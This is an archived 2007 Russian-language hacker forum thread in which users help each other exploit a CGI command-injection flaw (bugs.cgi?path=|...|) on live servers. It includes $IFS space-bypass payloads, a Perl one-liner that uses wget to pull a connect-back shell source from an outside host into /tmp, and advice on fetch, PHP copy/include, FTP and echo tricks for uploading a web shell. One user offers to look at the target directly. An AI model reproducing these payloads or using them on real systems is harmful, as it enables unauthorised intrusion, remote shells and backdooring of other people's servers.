PDA

Просмотр полной версии : cgi!!!

fly
06.09.2007, 00:13
Есть уязв. вида bugs.cgi?path=|ls$IFS-la|, т.е. пробел надо заменять на $IFS , но на этом не вся беда, беда в том,что вроде и прав для залива хватает, но wget не пашет , curl тоже, думаю дело в $IFS, пробывал обойти это при помощи `perl$IFS-e$IFS"print$IFS.ch(39).wget$IFSxxx.narod.ru.chr(39).chr( 47).connback.c$IFS.chr(45).O'.chr(47).'tmp'.chr(47 ).'connback.c.chr(39)"|`
Думаю поонятно, что пытался замутить конбек, но фиг с маслом.
Может есть решение в данной проблеме!?
ртуть
06.09.2007, 00:19
у меня была такая запарка месяц назад на одном из рус серваков.... у тебя случаем не фря тама :)..... кароче, мне помог fetch (так вроде прально пишиЦа)
.... а тут ты загнул крендель

`perl$IFS-e$IFS"print$IFS.ch(39).wget$IFSxxx.narod.ru.chr(39).chr( 47).connback.c$IFS.chr(45).O'.chr(47).'tmp'.chr(47 ).'connback.c.chr(39)"|`
кул :D
Scipio
06.09.2007, 05:01
не факт, что качалки есть... нашел трабл... решай... но если не получается закачать шелл средствами sh пользуй пхп на данный момент: типа copy или иклюд четнаподобие... сомневаюсь, что поддержка пхп отключена или
Sn@k3
06.09.2007, 10:04
а ты не пробывал другие альтернативы пробела?
$n@ke
06.09.2007, 13:34
у меня была проблема такого же типа..причем на серве стояла OSF1 ось...which там не пахало, качалки все испробовал - результата 0. так ничего и не залил.файл создается через touch,но средствами echo так и не вышло ничего записать в файл...ничего не вышло вобщем...
ртуть
06.09.2007, 13:51
у меня была проблема такого же типа..причем на серве стояла OSF1 ось...which там не пахало, качалки все испробовал - результата 0. так ничего и не залил.файл создается через touch,но средствами echo так и не вышло ничего записать в файл...ничего не вышло вобщем...
партизаны не сдаюца... дай я попробую ;)
fly
06.09.2007, 19:17
2 ettee echo не понимает знака > перенаправления !!!
Все, что тут сказано испробовал, но не работает . :(
Спасибо всем!!!
Xex
06.09.2007, 23:40
2fly
попробую загрузить файл по фтп,
echo понимает все знаки, надо прально преподнести ему это -e
fly
07.09.2007, 12:59
2 Xex
Да ты прав можно пробовать через ftp, но напомни синтаксис !
Я пробовал давно, но так и не смог получить результата !
mister
09.09.2007, 01:02
а если $IFS заменить на {$IFS}?
Ch3ck
09.09.2007, 01:07
Кинь ссылку в ПМ. Погляжу.
SanyaX
09.09.2007, 01:14
Проверь сущевствуют ли воще качалки командой which. Потом пробуй тогда wget$IFShttP://site.com/shell.cgi я думаю должно залиться ели пробуй через echo мутить. И последний твой способ через eval замутить.